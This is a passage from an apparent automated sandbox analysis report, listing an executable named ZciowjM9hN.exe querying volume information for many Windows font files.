Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
